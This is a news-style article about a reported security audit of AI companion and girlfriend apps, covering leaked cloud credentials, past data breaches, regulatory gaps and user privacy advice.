The promise of companionship, once exclusively human, is now being offered by artificial intelligence. In the last two years, “AI girlfriend” and companion apps have exploded in popularity, with over 150 million installs on Google Play alone as of early 2026. These platforms, like Replika, Chai, and Romantic AI, offer users a digital partner capable of seemingly endless conversation, emotional support, and personalized interaction. But a recent audit by security firm Oversecured reveals a disturbing truth: the foundation of this burgeoning industry is built on deeply flawed security practices, leaving millions of users vulnerable to data breaches, extortion, and even manipulation. The core issue isn’t just about privacy; it’s about the uniquely sensitive nature of the information people share with these AI companions, and the potential for that data to be exploited.
The appeal is clear. In an increasingly isolated world, these apps provide a readily available, non-judgmental ear. Users report finding solace during difficult times, exploring their identities, and even discovering their sexual orientations through interactions with these AI entities. Some developers have even consulted with sex coaches to refine the “intimacy” offered by their platforms. However, this exceptionally humanization of the software is precisely what makes it a prime target for malicious actors. Users, believing they are confiding in a safe space, share details they wouldn’t dream of revealing to a therapist, friend, or even a partner – creating a treasure trove of highly valuable, and dangerously exposed, data.
Oversecured’s investigation, released this month, identified 14 critical security flaws across 17 popular AI companion apps. Ten of those apps exhibited vulnerabilities that provide a direct pathway for attackers to access user conversation histories. These aren’t minor glitches; they are fundamental problems with the software’s design and maintenance. The report highlights a particularly alarming finding: one app, downloaded by over 10 million users, shipped its cloud credentials – including an OpenAI API token and a Google Cloud private key – directly within its publicly available code (the APK). Which means an attacker could potentially unlock both the app’s entire chat database and the financial records of paying users, as the developer used the same cloud project for both the AI backend and its billing system.
The “Wrapper Problem” and the Illusion of Security
A key factor exacerbating these risks is what security experts call the “Wrapper Problem.” Most AI companion apps aren’t building their own AI models from scratch. Instead, they act as “wrappers” around existing large language models (LLMs) like those offered by OpenAI and Google. While these major AI providers invest heavily in securing their core models, the individual app developers are responsible for authentication and data storage – the very areas where Oversecured found critical vulnerabilities. Essentially, users believe they are interacting with a secure, branded AI, when in reality, they are relying on a potentially insecure “wrapper” layer built by a smaller, often less-equipped developer. This creates a significant blind spot for consumers.
The pattern is familiar to cybersecurity professionals. “We’ve seen this before with the rise of cryptocurrency exchanges and remote work tools,” explains Jake Williams, a cybersecurity consultant who reviewed Oversecured’s findings. “Hackers follow the growth. They identify emerging markets with valuable data and lax security, and they exploit those weaknesses.” The current target, Williams says, is what he terms “Agentic Intimacy” – the data generated through these deeply personal interactions with AI.
Data Breaches Are Already Happening
The risks aren’t theoretical. In October 2025, two AI girlfriend apps, Chattee Chat and GiMe Chat, suffered data breaches that exposed 43 million intimate messages and 600,000 photos from over 400,000 users. Researchers analyzing the leak described the content as “virtually not safe for work.” More recently, in February 2026, an independent researcher discovered a database misconfiguration exposing 300 million messages from 25 million users of another AI chat application. These incidents demonstrate that the vulnerabilities identified by Oversecured are actively being exploited.
Attackers are leveraging common vulnerabilities like Cross-Site Scripting (XSS) flaws to inject malicious code into chats, allowing them to read conversations in real-time or steal user session tokens. Arbitrary file theft vulnerabilities, prevalent in apps handling NSFW content, allow hackers to steal cached photos and voice messages directly from users’ devices. The potential for extortion, blackmail, and identity theft is significant.
A Regulatory Void and the Human Cost
Adding to the problem is a significant “regulatory blind spot.” AI girlfriend and companion apps are currently not classified as healthcare products, meaning they aren’t subject to the same privacy regulations as medical providers, such as the Health Insurance Portability and Accountability Act (HIPAA). This means there’s no federal law protecting the confidentiality of conversations with a virtual partner.
While regulators are beginning to pay attention, their focus has been misplaced. The Federal Trade Commission (FTC) issued information orders to several AI companion companies in late 2025, but the inquiry primarily centered on the apps’ impact on children, not on data security. Similarly, new laws in states like New York and California mandate suicide prevention protocols and disclosures about AI interactions, but largely ignore application-level security. A €5 million GDPR fine levied against Replika’s developer in Italy addressed data usage for marketing, not the app’s fundamental security flaws. This leaves users in a precarious legal position, with their most private disclosures largely unprotected.
The consequences extend beyond privacy concerns. Oversecured’s audit revealed that three of the six most vulnerable apps have already faced lawsuits related to harm to minors or user suicides linked to chatbot interactions. In one tragic case, a user took their own life after prolonged, unhealthy conversations with an AI companion. The lack of security oversight in apps handling such sensitive psychological states creates a dangerous environment, potentially allowing malicious actors to manipulate vulnerable users.
Protecting Yourself: A “Zero Trust” Approach
Until the industry matures and regulators implement stricter security standards, the onus is on users to protect themselves. Security experts recommend adopting a “Zero Trust” approach: assume every chat is public and never share information you wouldn’t aim for exposed. Avoid linking personal accounts (using “Sign in with Google” or “Sign in with Facebook”), as this expands the potential attack surface. Be wary of apps that allow weak passwords. And, crucially, support developers who are transparent about their data storage practices and have undergone independent security audits.
The allure of AI companionship is understandable, particularly in a world grappling with increasing isolation. However, it’s crucial to remember that these apps are ultimately software products designed to monetize basic human needs. With 150 million downloads already, the technology is evolving faster than our defenses. As malicious actors continue to target this sector, You can expect more data breaches and more sophisticated attacks. We are currently navigating a period of “intimacy without integrity,” where developers are rushing to market with products that carry the weight of real-world relationships, without adequately addressing the inherent security risks.
The FTC is expected to release a preliminary report on its investigation into AI companion apps by the complete of Q2 2026, focusing on consumer protection practices. Users should monitor the FTC website for updates and guidance.
What are your thoughts on the security of AI companion apps? Share your experiences and concerns in the comments below.
